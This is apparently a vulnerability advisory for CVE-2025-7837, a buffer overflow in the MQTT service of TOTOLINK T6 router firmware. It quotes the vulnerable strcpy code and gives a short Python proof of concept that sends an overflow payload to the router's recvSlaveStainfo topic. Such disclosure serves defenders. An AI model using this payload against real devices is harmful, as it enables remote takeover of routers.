### Key Information #### Vulnerability Identifier - **CVE ID**: CVE-2025-7837 #### Affected Scope - **Vendor**: TOTOLINK - **Affected Product**: T6 - **Affected Firmware Version**: V4.1.5cu.748_B20211015 #### Vulnerability Overview - **Vulnerability Type**: Buffer Overflow - **Service**: MQTT - **Port**: 1883 - **Impact**: Can lead to Remote Code Execution (RCE) #### Vulnerability Details - **Problem Function**: `recvSlaveStainfo` - **Problem Code**: ```c char dest[4]; // [sp+4h] [bp-1Ch] BYREF int v9; // [sp+8h] [bp-18h] int v10; // [sp+Ch] [bp-14h] int v11; // [sp+10h] [bp-10h] v9 = dest; strcpy(dest, Var); ``` - **Description**: The `dest` buffer has a size of 4 bytes, but `strcpy` does not check the input length, leading to a buffer overflow. #### Attack Method - **Attack Vector**: Sending malicious MQTT packets - **Example**: ```python import paho.mqtt.client as mqtt payload = b'A' * 36 + b'\x37\x23\x39\x13' client = mqtt.Client() client.connect("192.168.8.1", 1883, 60) client.publish("/totolink/router/recvSlaveStainfo", b"{'slavemac':'%s'}" % payload) ``` #### Conclusion This vulnerability allows attackers to exploit a buffer overflow by sending specially crafted MQTT packets, leading to remote code execution, posing a severe security threat to affected devices.